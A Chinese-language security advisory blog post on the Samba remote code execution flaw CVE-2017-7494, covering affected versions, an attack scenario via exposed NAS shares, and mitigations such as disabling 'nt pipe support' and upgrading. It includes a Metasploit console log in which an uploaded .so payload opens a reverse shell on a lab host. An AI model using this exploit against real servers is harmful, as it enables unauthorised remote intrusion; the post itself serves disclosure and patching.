Samba远程代码执行漏洞,又一个“永恒之蓝”来了(CVE-2017-7494)
laoyan 2017-05-25 14:25:49
分 享


漏洞描述


2017年5月24 07:21:14 UTC 2017 ,Samba官方发布消息,Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录,会导致服务器加载并执行指定的库文件。Samba是一个能让类Unix计算机和其它MS Windows计算机相互共享资源的软件。Samba提供有关资源共享的三个功能,包括:smbd,可以使类Unix计算机能够共享资源给其它的计算机;smbclient是让类Unix计算机去存取其它计算机的资源;最后一个smbmount是类似MS Windwos下“网络磁盘驱动器”的功能,可以把其它计算机的资源挂载到当前系统下。


漏洞编号


CVE-2017-7494


漏洞影响


该漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

不受影响的版本
Samba Version = 4.6.4
Samba Version = 4.5.10
Samba Version = 4.4.14


漏洞级别


高危


漏洞详情


Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。不过与Windows不同,Samba的SMB功能默认不打开,必须手动打开。一种可能的攻击场景是,黑客先攻击家用网络中的NAS设备,因为NAS更可能将文件分享端口暴露于公网,随后黑客再进一步攻击局域网。metasploit已经有该漏洞的poc。


msf exploit(is_known_pipename) > exploit 
[*] Started reverse TCP handler on 192.168.1.3:4444 
[*] 192.168.1.3:445 - Using location \\192.168.1.3\home\share for the path
[*] 192.168.1.3:445 - Payload is stored in //192.168.1.3/home/share as FsOYkRMZ
.so
[*] 192.168.1.3:445 - Trying location /home/share/FsOYkRMZ.so...
[*] Command shell session 6 opened (192.168.1.3:4444 -> 192.168.1.3:45076) at 2017-05-24 19:50:00 -0600
id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)



解决方法


(1)用户可以通过在smb.conf的[global]节点下增加 nt pipe support = no 选项,然后重新启动samba服务, 以此达到缓解该漏洞的效果

(2)使用源码安装的Samba用户,请尽快下载最新的Samba版本手动更新

(3)使用二进制分发包(RPM等方式)的用户立即进行yum,apt-get update等安全更新操作


参考地址


https://www.samba.org/samba/security/CVE-2017-7494.html


我要小额支持下

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

取消
吐槽一下

游客

所有吐槽
  • 暂时还没有吐槽,赶紧来吐槽!